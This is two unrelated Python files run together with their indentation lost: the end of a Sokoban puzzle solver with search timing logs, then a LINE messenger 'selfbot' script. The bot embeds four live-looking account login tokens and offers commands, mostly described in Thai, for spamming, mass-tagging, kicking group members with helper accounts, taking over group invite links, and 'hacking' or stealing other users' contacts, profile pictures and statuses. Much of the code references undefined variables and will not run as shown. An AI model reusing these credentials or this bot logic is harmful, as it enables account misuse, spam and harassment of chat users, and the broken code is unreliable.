moves=[] # list of [ targetPlayerPosition, moveDirection, steps, box no]
SearchEligibleMoves( map2, state, moves, log)
#print(moves)
if( len(moves)):
mv_progress_slot = progress_slot/len(moves)
else:
output_progress( progress_slot) # END_NODE
#Try each possible move
for i_mov, mov in enumerate(moves):
#if( depth<2): print( depth, mov, mv_progress_slot)
steps = mov[2]
box_no = mov[3]
mov_dir = mov[1]
g_tm_start()
new_state = copy.deepcopy(state)
g_tm_add()
new_state.moveBox( box_no, mov_dir)
#print( box_no, mov_dir)
#check if meet goal
if( new_state.matchGoal(goal)):
print( "Reach Goals!")
print( "Depth:", depth+1)
print( "Total Steps:", total_steps+steps+1)
log.append([box_no, steps, mov_dir, i_mov])
for l in log:
print( " Move Box: {:d} Steps: {:d} Dir: {} i: {}".format(l[0],l[1],l[2],l[3]))
return True
#check if new_state is duplicate
key = new_state.get_hexdigest()
if( key in trace):
#print( "duplicate state!")
global g_para_duplicate_state_count
global g_para_duplicate_state_count2
g_para_duplicate_state_count += 1
if( trace[key] < depth+1):
g_para_duplicate_state_count2 += 1
output_progress( mv_progress_slot) # END_NODE
continue
log.append([box_no, steps, mov_dir, i_mov])
trace[key] = depth+1
#print( new_state.get_hexdigest())
#start a new node for search
if( Solve2( map, new_state, goal, depth+1, total_steps+steps+1, trace, log, mv_progress_slot)):
return True
#log.pop()
#continue #Find next alternative solution
else:
log.pop()
#output_progress( mv_progress_slot)
#trace.pop(key)
continue
return False
def output_progress( progress):
global g_progress
global g_progress_prv_time
g_progress += progress
tmp = datetime.datetime.now()
if( tmp - g_progress_prv_time > datetime.timedelta(seconds=2.0)):
print( "progress: {:.4f}%".format(g_progress))
g_progress_prv_time = tmp
s = STATE()
mapstr = "#---WWWW-"+"#WWWW PW-"+"#W B W-"+"#W B WW"+"#WWB B W"+"#-W B W"+"#-W WWWW"+"#-WWWW---"
goal = [[3,3],[3,4],[3,5],[4,4],[4,5]]
goal = [[3,4],[3,2],[4,2],[4,4],[5,4]] # one step
MAX_STEPS = 21
MAX_DEPTH = 5
goal = [[2,5],[3,2],[4,2],[4,4],[5,4]] # one step
# goal = [[3,5],[3,2],[4,2],[4,4],[5,4]] # two steps
# goal = [[3,5],[3,2],[4,2],[4,4],[5,3]] # two steps
# MAX_STEPS = 21
# MAX_DEPTH = 4
# goal = [[3,5],[3,3],[4,2],[4,4],[5,3]]
# goal = [[3,4],[3,3],[4,2],[4,4],[5,5]] # two steps
# goal = [[3,4],[3,3],[4,2],[4,3],[5,5]] # two steps
# goal = [[3,4],[3,3],[3,2],[4,3],[5,5]] # two steps
# Time Used:0:00:01.915810
# MAX_STEPS = 28
# MAX_DEPTH = 6
# goal = [[3,4],[3,3],[2,2],[4,3],[5,5]]
# Time Used: 0:00:17.317066
# Time Used (g_tm_CountSteps2): 0:00:05.415582
# Total State Searched: 18628
# Total Max Exceeded: 111053
# Duplicate Key Count : 156954
# Duplicate Key Count2: 26714
MAX_STEPS = 31
MAX_DEPTH = 8
goal = [[3,4],[3,3],[2,4],[4,3],[5,5]]
# Time Used: 0:00:46.802952
# Time Used (g_tm_CountSteps2): 0:00:15.552429
# Total State Searched: 33324
# Total Max Exceeded: 276172
# Duplicate Key Count : 426214
# Duplicate Key Count2: 79402
# MAX_STEPS = 32
# MAX_DEPTH = 9
# goal = [[3,4],[3,3],[2,5],[4,3],[5,5]]
# Time Used: 0:01:46.428706
# Time Used (g_tm_CountSteps2): 0:00:34.125447
# Total State Searched: 53777
# Total Max Exceeded: 553840
# Duplicate Key Count : 941157
# Duplicate Key Count2: 202331
# Time Diff (STATE Copy): 0:00:15.649496
MAX_STEPS = 33
MAX_DEPTH = 10
goal = [[4,4],[3,3],[2,5],[4,3],[5,5]]
# Time Used: 0:21:59.884430
# Time Used (g_tm_CountSteps2): 0:07:51.087651
# Total State Searched: 184658
# Total Max Exceeded: 4987044
# Duplicate Key Count : 11314176
# Duplicate Key Count2: 3603415
# MAX_STEPS = 40
# MAX_DEPTH = 13
# goal = [[4,4],[3,3],[2,5],[4,3],[5,2]]
# # Time Used:
# MAX_STEPS = 45
# MAX_DEPTH = 16
# goal = [[4,4],[3,3],[2,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 46
# MAX_DEPTH = 17
# goal = [[4,4],[3,4],[2,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 52
# MAX_DEPTH = 19
# goal = [[4,4],[3,4],[4,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 61
# MAX_DEPTH = 20
# goal = [[4,4],[3,4],[4,5],[3,3],[2,2]]
# # Time Used:
# MAX_STEPS = 71
# MAX_DEPTH = 24
# goal = [[4,4],[3,4],[4,5],[3,3],[3,5]]
s.setup( mapstr)
g_progress_prv_time = datetime.datetime.now()
start_time = datetime.datetime.now()
if True:
Solve( s, goal)
else:
x = threading.Thread( target=Solve, args=(s,goal))
x.start()
x.join()
diff_time = datetime.datetime.now() - start_time
print( "Time Used: {}".format(diff_time))
print( "Time Used (g_tm_CountSteps2): {}".format(g_tm_CountSteps2))
print( "Total State Searched: {}".format(g_para_total_state_searched))
print( "Total Max Exceeded: {}".format(g_para_max_exceeded))
print( "Duplicate Key Count : {}".format(g_para_duplicate_state_count))
print( "Duplicate Key Count2: {}".format(g_para_duplicate_state_count2))
g_tm_print("STATE Copy")
# Setup Map and State:{ Goal, Box, Player, Wall }
# Logs:
# Time Used:0:29:37.108837
# Total State Searched: 184,658
# Duplicate Key Count : 11,319,687
# Duplicate Key Count2: 3,602,166
# MAX_STEPS = 40
# MAX_DEPTH = 13
# goal = [[4,4],[3,3],[2,5],[4,3],[5,2]]
# Depth: 13
# Total Steps: 40
# Move Box: 0 Steps: 1 Dir: [1, 0] i: 0
# Move Box: 4 Steps: 4 Dir: [0, 1] i: 6
# Move Box: 1 Steps: 7 Dir: [0, 1] i: 3
# Move Box: 3 Steps: 6 Dir: [0, -1] i: 2
# Move Box: 2 Steps: 3 Dir: [-1, 0] i: 2
# Move Box: 2 Steps: 0 Dir: [-1, 0] i: 0
# Move Box: 2 Steps: 2 Dir: [0, 1] i: 0
# Move Box: 2 Steps: 0 Dir: [0, 1] i: 1
# Move Box: 2 Steps: 0 Dir: [0, 1] i: 1
# Move Box: 0 Steps: 0 Dir: [1, 0] i: 2
# Move Box: 4 Steps: 4 Dir: [0, -1] i: 5
# Move Box: 4 Steps: 0 Dir: [0, -1] i: 0
# Move Box: 4 Steps: 0 Dir: [0, -1] i: 0
|
botai2.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EvyRA6uk6WO6OANNneCf.zsjptOGse28bSLj1PuTA7W.69J4S3XwOhfQOzyc/cz+oEZe9uGJfYCWIjHzdfhmM9o=')
cl.loginResult()
print "Cl-Login Success\n"
ki1 = LINETCR.LINE()
#ki1.login(qr=True)
ki1.login(token='Ev69mxc1xsPI0PZv3rR3.ceM9NaolFHDUaV2+G8nZyW.dIMEwUnTtabrS/gHoTpPKbYx6n8OTe3HiHY4S5d8LMM=')
ki1.loginResult()
print "Ki-Login Success\n"
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki2.loginResult()
print "Kk-Login Success\n"
ki10 = LINETCR.LINE()
#ki10.login(qr=True)
ki10.login(token='EveDBXagKElQaY3wLBT7.zHaODuDXU8bfbqzFy+szXW.NfYuKFYnbskfXDh69vYhjmP3ZDACQuw00qrTCSAHqcE=')
ki10.loginResult()
print "Kc-Login Success\n"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 1 ☬]
╚══════════════════
╔═════════════════════
║☬➣『คท』
║☬➣『เปิด คท』
║☬➣『ปิด คท』
║☬➣『#คท』 ไวรัส คท
║☬➣『คท @』
║☬➣『ไอดี』
║☬➣『ไอดีกลุ่ม ทั้งหมด:』
║☬➣『Mid』
║☬➣『Mid @』
║☬➣『Allmid』
║☬➣『Mc:』
║☬➣『Gift,แจก』
║☬➣『คิก1 -- คิก10 แจก』
║☬➣『Mid @』
║☬➣『Cn: 』 ตั้งชื่อ
║☬➣『ตั้งชื่อ: 』ตั้งชื่อ นาฬิกา
║☬➣『เปิด นาฬิกา』
║☬➣『ปิด นาฬิกา』
║☬➣『กลุ่ม』
║☬➣『Tl: text』
║☬➣『Tx:』 สร้างชื่อไวรัส
║☬➣『ออน』เช็คเวลา ออนไลน์
║☬➣『เปิด ดึงกลับ』
║☬➣『ปิด ดึงกลับ』
║☬➣『เปิด เข้ากลุ่ม』
║☬➣『ปิด เข้ากลุ่ม』
║☬➣『เปิด เพิ่มเพื่อย』
║☬➣『ปิด เพิ่มเพื่อน』
║☬➣『เปิด ออกแชท』
║☬➣『ปิด ออกแชท』
║☬➣『เปิด แชร์』
║☬➣『ปิด แชร์』
║☬➣『Add message: text』
║☬➣『Message:』
║☬➣『คอมเม้น: 』
║☬➣『เปิด คอมเม้น』
║☬➣『ปิด คอมเม้น』
║☬➣ 『เวลา』เช็ค วัน - เวลา
║☬➣『ยูทูป 』
║☬➣『ขอเพลง』
║☬➣『siri:』
║☬➣『Siri-en』
║☬➣『พูด』
║☬➣『/พูด』 คิกเกอพูดตาม
║☬➣ 『/ 』 สติกเกอร์
║☬➣ 『ลบแชต』REMOVCHAT
║☬➣『ลบรัน』
║☬➣『คิก1 -- คิก10 ลบรัน』
║☬➣『Log-in / ขอลิ้ง』
║☬➣『ลบ』
║☬➣『 . 』
║☬➣『ประกาศ:』
║☬➣『ผู้สร้าง』
║☬➣『ผู้สร้างกลุ่ม』
║☬➣『ทีมงาน』
║☬➣『รีบอท / รีบูต』
║☬➣『รีคิก』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage2 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 2 ☬]
╚══════════════════
╔═════════════════════
║☬➣『บอท』
║☬➣『#บอท』
║☬➣『คิกมา』
║☬➣『คิกออก』
║☬➣『คิก1--10』 คิกเกอร์เข้า
║☬➣『บิน』 คำสั่งบินl
║☬➣『 Nk: 』
║☬➣『Kill』
║☬➣『เทส』
║☬➣『ยกเชิญ』
║☬➣『Cancel』
║☬➣『เปิด ลิ้ง』
║☬➣『ปิด ลิ้ง』
║☬➣『เป้ด เชิญ』
║☬➣『ปิด เชิญ』
║☬➣『เชิญ』
║☬➣『ลิ้ง』
║☬➣『Spam on/off』
║☬➣『รูปกลุ่ม』
║☬➣『#ดึงรูป』
║☬➣『Gurl』
║☬➣『Vps』
║☬➣『เชคค่า』
║☬➣『แทค』
║☬➣『เปิดหมด』
║☬➣『ปิดหมด』
║☬➣『แบน』
║☬➣『ลบแบน』
║☬➣『แบน @』
║☬➣『ลบแบน @』
║☬➣『ล้างดำ』
║☬➣『Cb』
║☬➣『Bl』
║☬➣『สั่งดำ @』
║☬➣『เปิด อ่าน』
║☬➣『ปิด อ่าน』
║☬➣『ลิสกลุ่ม』
║☬➣『Gcancel: 』
║☬➣『Gcancel on/off』
║☬➣『แปลงร่าง @』
║☬➣『กลับร่าง』
║☬➣『คิกทั้งหมด @』
║☬➣『คิก1- 10 แปลงร่าง @』
║☬➣『คิก คืนร่าง』
║☬➣『ตั้งเวลา』
║☬➣『.ใครอ่าน』
║☬➣『เพื่อน』
║☬➣『#เพื่อน』
║☬➣『บล็อค』
║☬➣『เปิด ล็อคชื่อ』
║☬➣『ปิด ล็อคชื่อ』
║☬➣『เปิด ป้องกัน』
║☬➣『ปิดป้องกัน』
║☬➣ 『รูป』 รูปเรา
║☬➣ 『ปก』 รูแปก เรา
║☬➣ 『โปรวีดีโอ』 วีดีโอโปร เรา
║☬➣ 『ตัส』 ตัสเรา
║☬➣ 『ลิ้งรูป』 ลิ้งรูปเรา
║☬➣ 『ลิ้งปก』 ลิ้งปกเรา
║☬➣ 『Hack @』ขโโมย คท + Mid
║☬➣ 『/รูป @』 ขโมย รูป
║☬➣ 『/ปก @』 ขโมย รูปปก
║☬➣ 『/ตัส @』 ขโมย ตัส
║☬➣ 『เชคหมด』เชครูป ปก ตัส
║☬➣『Sk』
║☬➣『Sp』
║☬➣『Bot Speed』
║☬➣『Key』
║☬➣『Qr on/off』
║☬➣『Backup on/off』
║☬➣『Protect On/off』
║☬➣『Namelock On/off』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage3 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 3 ☬]
╚══════════════════
╔═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Protact on/off
║☬➣〘Qr on/off
║☬➣〘Invit on/off〙
║☬➣〘Cancel on/off〙
╚═══════════════════
╔═══════════════════
║ ✟โหมดเรียนเเบบ✟
╠═══════════════════
║☬➣〘Mimic: on/off〙
║☬➣〘Micadd @〙
║☬➣ Micdel @〙
╠═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Contact on/off〙
║☬➣〘Autojoin on/off〙
║☬➣〘Autoleave on/off〙
║☬➣〘Autoadd on/off〙
║☬➣〘Like me〙
║☬➣〘Like friend〙
║☬➣〘Like on〙
║☬➣〘Respon on/off〙
║☬➣〘Read on/off〙
║☬➣〘Simisimi on/off〙
╠══════════════════
║ ✟ New function ✟
╠══════════════════
║☬➣〘Kalender〙
║☬➣〘tr-id 〙
║☬➣〘tr-en 〙
║☬➣〘tr-jp 〙
║☬➣〘tr-ko 〙
║☬➣〘say-id 〙
║☬➣〘say-en 〙
║☬➣〘say-jp 〙
║☬〘say-ko 〙
║☬➣〘profileig 〙
║☬➣〘checkdate 〙
╚══════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
╔════════════════════
║ ✦เปิด/ปิดข้อความต้อนรับ✦
╠════════════════════
║☬Hhx1 on ➠เปิดต้อนรับ
║☬Hhx1 off ➠ปิดต้อนรับ
║☬Hhx2 on ➠เปิดออกกลุ่ม
║☬Hhx2 off ➠ปิดออกกลุ่ม
║☬Hhx3 on ➠เปิดพูดถึงคนลบ
║☬Hhx3 off ➠ปิดพูดถึงคนลบ
║☬Mbot on ➠เปิดเเจ้งเตือน
║☬Mbot off ➠ปิดเเจ้งเตือน
║☬M on ➠เปิดเเจ้งเตือนตนเอง
║☬M off ➠ปิดเเจ้งเตือนตนเอง
║☬Tag on ➠เปิดกล่าวถึงเเท็ค
║☬Tag off ➠ปิดกล่าวถึงเเท็ค
║☬Kicktag on ➠เปิดเตะคนเเท็ค
║☬Kicktag off ➠ปิดเตะคนเเท็ค
╚═════════════════════
╔═════════════════════
║ ✦โหมดตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1˓: ➠ไส่ข้อความต้อนรับ
║☬Hhx2˓: ➠ไส่ข้อความออกจากกลุ่ม
║☬Hhx3˓: ➠ไส่ข้อความเมื่อมีคนลบ
║☬Tag1: ➠ใส่ข้อความแทค
║☬Tag2: ➠ ใส่ข้อความแทค
╚═════════════════════
╔═════════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1 ➠เช็คข้อความต้อนรับ
║☬Hhx2 ➠เช็คข้อความคนออก
║☬Hhx3 ➠เช็คข้อความคนลบ
║☬Tag1 ➠เช็ตข้อความแทค
║☬Tag2 ➠เช็คข้อความแทค
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
KAC=[cl]
mid = cl.getProfile().mid
Amid1 = ki1.getProfile().mid
Amid2 = ki2.getProfile().mid
#Amid3 = ki3.getProfile().mid
#Amid4 = ki4.getProfile().mid
#Amid5 = ki5.getProfile().mid
#Amid6 = ki6.getProfile().mid
#Amid7 = ki7.getProfile().mid
#Amid8 = ki8.getProfile().mid
#Amid9 = ki9.getProfile().mid
#Amid10 = ki10.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
mid = cl.getProfile().mid
Bots = ["",mid]
self = ["",mid]
admin = ""
admsa = ""
owner = ""
adminMID = ""
Creator=""
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"[ตอบรับ อัตโนมัติ]\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nhttp://line.me/ti/p/arif.mh",
"lang":"JP",
"commentOn":True,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[ รับติดตั้ง เชลบอท ราคาประหยัด ]
[By.☬ARIFISTIFIK☬]
http://line.me/ti/p/arif.mh
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[ By. ผู้สร้าง พญาไฟ ]
http://line.me/ti/p/arif.mh
""",
"acommentOn":False,
"bcommentOn":False,
"ccommentOn":False,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":True,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"tag2":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"posts":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup = ki2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = ki3.getProfile()
#backup = ki3.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki4.getProfile()
#backup = ki4.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki5.getProfile()
#backup = ki5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki6.getProfile()
#backup = ki6.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki7.getProfile()
#backup = ki7.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki8.getProfile()
#backup = ki8.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki9.getProfile()
#backup = ki9.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki10.getProfile()
#backup = ki10.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
day, hours = divmod(hours,24)
return '%02d วัน %02d ชั่วโมง %02d นาที %02d วินาที' % (day,hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki1.getGroup(op.param1)
except:
try:
G = ki2.getGroup(op.param1)
except:
try:
G = ki3.getGroup(op.param1)
except:
try:
G = ki4.getGroup(op.param1)
except:
try:
G = ki5.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki1.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki3.updateGroup(G)
except:
try:
ki4.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"Group Name Lock")
ki1.sendText(op.param1,"Haddeuh dikunci Pe'a")
ki2.sendText(op.param1,"Wekawekaweka (Har Har)")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid1:
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid4:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid5:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(X)
